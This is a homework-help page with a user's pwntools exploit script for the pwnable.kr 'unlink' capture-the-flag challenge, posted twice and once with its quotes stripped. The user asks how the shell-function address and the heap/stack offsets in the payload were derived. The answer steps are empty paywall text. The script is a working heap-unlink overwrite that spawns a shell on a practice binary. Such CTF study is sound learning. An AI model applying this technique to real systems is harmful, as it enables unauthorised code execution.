Question
from pwn import * context(os='linux', log_level='debug') #p=process(./unlink) s = ssh(host='pwnable.kr', port=2222,user='unlink',password='guest') p = s.process(./unlink) shell_addr=0x080484eb stack_addr=p.recvline() stack_addr=stack_addr.split(: 0x)[1][:-1] stack_addr=int(stack_addr,16) heap_addr=p.recvline() heap_addr=heap_addr.split(: 0x)[1][:-1] heap_addr=int(heap_addr,16) log.info(stack addr
from pwn import * context(os='linux', log_level='debug') #p=process("./unlink") s = ssh(host='pwnable.kr', port=2222,user='unlink',password='guest') p = s.process("./unlink") shell_addr=0x080484eb stack_addr=p.recvline() stack_addr=stack_addr.split(": 0x")[1][:-1] stack_addr=int(stack_addr,16) heap_addr=p.recvline() heap_addr=heap_addr.split(": 0x")[1][:-1] heap_addr=int(heap_addr,16) log.info("stack addr = 0x%x" % stack_addr) log.info("heap_addr = 0x%x" % heap_addr) p.recvuntil("get shell! ") payload=p32(shell_addr)+"a"*12+p32(heap_addr + 0xc)+p32(stack_addr+ 0x10) print payload p.sendline(payload) p.interactive() Please help me answer the following:
1. How to get the address of the shellcode() function (0x080484eb)?
2. The structure of the shellcode (payload).
3. Whats the meaning of p32(heap addr + 0xc) and p32(stack addr+ 0x10)? Why we need to use 0xc and 0x10?
Step by Step Solution
There are 3 Steps involved in it
Step: 1
Get Instant Access to Expert-Tailored Solutions
See step-by-step solutions with expert insights and AI powered tools for academic success
Step: 2
Step: 3
Ace Your Homework with AI
Get the answers you need in no time with our AI-driven, step-by-step assistance
Get Started
Advanced Oracle Solaris 11 System Administration
Authors: Bill Calkins
1st Edition
0133007170, 9780133007176
